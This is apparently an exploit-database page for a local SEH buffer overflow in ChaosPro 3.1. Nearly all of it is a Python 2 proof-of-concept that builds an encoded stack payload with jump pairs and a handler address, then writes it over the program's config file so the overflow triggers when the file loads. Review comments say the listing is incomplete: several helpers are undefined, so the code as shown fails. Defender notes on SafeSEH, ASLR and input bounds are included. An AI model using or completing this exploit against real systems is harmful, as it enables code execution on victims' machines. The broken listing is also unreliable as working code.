Exploits / Vulnerability Discovered : 2019-09-02 |
Type : local |
Platform : windows
This exploit / vulnerability (ChaosPro 3.1 SEH buffer overflow) is for educational purposes only; if you use it, you do so at your own risk.
[+] Code ...
#!C:\Python27\python.exe
# Title : ChaosPro 3.1
# Twitter : @securitychops
# Blog Post : https://securitychops.com/2019/08/24/retro-exploit-series-episode-one-chaospro-3-1.html
#
# Proof-of-concept for an SEH-based overflow in the ChaosPro 3.1 config-file
# parser. The script builds one byte string (`junk`): an 8-byte egg marker,
# several "stage" blocks that each zero EAX, apply three 5-byte instructions
# (opcode 0x2d + 4-byte immediate) and push EAX, "A" filler sized to a 126-byte
# window, short jump pairs between windows, and finally a 3-byte SEH handler
# address. It then writes `junk` over the application's own ChaosPro.cfg, so
# the overflow fires the next time the program loads its config.
#
# NOTE(review): this listing is incomplete. `junk`, `zero_eax`, `push_esp`,
# `pop_eax`, `align_stack`, `push_eax`, `pop_esp`, `jmpforward06` and
# `jmpback80` are never defined here, so as shown the script raises NameError
# at the first `junk +=`. `payload` is built but never used afterwards;
# presumably the missing lines define the helpers and seed `junk` from it.
#
# NOTE(review): Python 2 only (see shebang): `"\x.."` literals are byte strs
# and open(..., 'w') writes them verbatim. Under Python 3 the text-mode write
# would UTF-8-encode every byte >= 0x80 and the output would differ.
#
# Defender notes: the trigger is a local write to the application's config
# file followed by the program reading it; a process other than ChaosPro
# rewriting `ChaosPro.cfg` is the observable artefact. The 3-byte handler
# address (implicit trailing 0x00) points into a low, presumably non-rebased
# module; building the binary with SafeSEH/ASLR/DEP and bounding the config
# field length in the parser would remove the technique.
# our egg!
payload = "T00WT00W"
# adjust the stack from 00F2FFA6 to 00F2FFA8
payload += "\x83\xC4\x02"
# ok, lets start working stuff here ... we have 126 bytesish ...
# Stage 0: copy ESP into EAX, align it, move it back -- sets up the stack
# pointer so the later PUSH EAX writes land where the jumps expect.
junk += zero_eax
junk += push_esp + pop_eax # push esp, pop eax
junk += align_stack
junk += push_eax
junk += pop_esp
# first section into the stack
# e7 ff e4 75
# good
# Each section: zero EAX, three 0x2d-prefixed 5-byte instructions whose
# immediates compose the 4 target bytes named in the comment above, then
# push the result. The 4-byte target is the author's claim, not re-derived here.
junk += zero_eax
junk += "\x2d\x89\x88\x87\x86"
junk += "\x2d\x01\x8f\x77\x8f"
junk += "\x2d\x01\x04\x01\x02"
junk += push_eax
# second section into the stack
# af e7 75 af
# good
junk += zero_eax
junk += "\x2d\x4f\x4e\x4d\x4c"
junk += "\x2d\x01\x39\x8f\x02"
junk += "\x2d\x01\x03\x3c\x01"
junk += push_eax
# third section into the stack
# d7 89 57 30
# good
junk += zero_eax
junk += "\x2d\x8f\x8e\x74\x73"
junk += "\x2d\x3e\x19\x01\x8f"
junk += "\x2d\x03\x01\x01\x26"
junk += push_eax
# size for section one
# Filler to pad this 126-byte window; every term below must match the bytes
# appended above or the jumps at the end of the window land off by that much.
# NOTE(review): the "- 9" is presumably the length of the stage-0 sequence
# (zero_eax + push_esp/pop_eax + align_stack + push_eax + pop_esp), not a
# nopsled as the comment says -- cannot confirm without the missing helpers.
junk += "A" * (
126
- 9 # nopsled
# first set of bytes going onto the stack
- len(zero_eax)
- 15
- len(push_eax)
# second set of bytes going onto the stack
- len(zero_eax)
- 15
- len(push_eax)
# third set of bytes going onto the stack
- len(zero_eax)
- 15
- len(push_eax)
)
# baby nopslep just for breathing room
junk += "AAAA"
# First Jump Backwards 0xFF - 0x80 bytes (0x7F or 127)
# Short forward hop over the SEH record, then a short jump back into the
# previous window (the exact encodings live in the undefined helpers).
junk += jmpforward06
junk += jmpback80
#Section Two
# baby nopsled
junk += "AAA"
# fourth section into the stack part two
# 30 54 b8 ec
# fourth section into the stack part one
junk += zero_eax
junk += "\x2d\x80\x15\x75\x75"
junk += "\x2d\x80\x20\x32\x35"
junk += "\x2d\x14\x11\x04\x25"
junk += push_eax
# fifth section into the stack
# 74 5a 05 3c
# good
junk += zero_eax
junk += "\x2d\x8f\x8e\x8d\x89"
junk += "\x2d\x34\x6b\x17\x01"
junk += "\x2d\x01\x01\x01\x01"
junk += push_eax
# sixth section into the stack
# 2e cd 58 53
# good
junk += zero_eax
junk += "\x2d\x8f\x8e\x8d\x8c"
junk += "\x2d\x1d\x18\x8e\x43"
junk += "\x2d\x01\x01\x17\x01"
junk += push_eax
# seventh section into the stack
# 43 43 db 31
# good
junk += zero_eax
junk += "\x2d\x8f\x8e\x8d\x8c"
junk += "\x2d\x3e\x7f\x2d\x2d"
junk += "\x2d\x02\x17\x01\x03"
junk += push_eax
# Filler for window two. Unlike window one this also subtracts the trailing
# 4-byte nopsled and the jmpback80 that close the window.
junk += "A" * (
126 # amount of room before we need to jump
- 3 # baby nopsled
# part one of fourth set of bytes going onto the stack
- len(zero_eax)
# part two of fourth sec of bytes going onto the stack
- 15
- len(push_eax)
# fifth set of bytes going onto the stack
- len(zero_eax)
- 15
- len(push_eax)
# sixth set of bytes going onto the stack
- len(zero_eax)
- 15
- len(push_eax)
# seventh set of bytes going onto the stack
- len(zero_eax)
- 15
- len(push_eax)
- 4 # baby nopsled
- len(jmpback80)
)
# Second Jump Backwards 0xFF - 0x80 bytes (0x7F or 127)
junk += jmpforward06
junk += jmpback80
# baby nopsled
junk += "AAAA"
# eighth section into the stack part two
# 52 42 0f ff
# good
# eighth section into the stack part one
junk += zero_eax
junk += "\x2d\x65\x65\x75\x75"
junk += "\x2d\x65\x65\x25\x25"
junk += "\x2d\x37\x25\x23\x13"
junk += push_eax
# ninth section into the stack
# ca 81 66 43
# good
junk += zero_eax
junk += "\x2d\x8f\x81\x7c\x7b"
junk += "\x2d\x2d\x17\x01\x8f"
junk += "\x2d\x01\x01\x01\x2b"
junk += push_eax
# Filler for window three; note this one subtracts len(jmpforward06) where the
# earlier windows did not -- the three size formulas are not parallel, so any
# change to one helper's length needs all three re-checked.
junk += "A" * (
126 # amount of room before we need to jump
- len(jmpback80)
- 4 # baby nopsled
# eighth set of bytes going onto the stack
# eighth section
- len(zero_eax)
- 15
- len(push_eax)
# ninth set of bytes going onto the stack
- len(zero_eax)
- 15
- len(push_eax)
- len(jmpforward06)
)
# First Jump Backwards 0xFF - 0x80 bytes (0x7F or 127)
junk += jmpforward06
junk += jmpback80
#seh address for pop, pop and ret with a 0x00 at the end ...
# Only 3 bytes are written; the parser's own string terminator supplies the
# 4th (0x00) byte of the handler address.
junk += "\x5d\x10\x40"
# write the evil file
# Overwrites the application's real config in place (text mode, Python 2 str).
with open('C:\\Program Files\\ChaosPro3.1\\ChaosPro.cfg', 'w') as the_file:
    the_file.write(junk)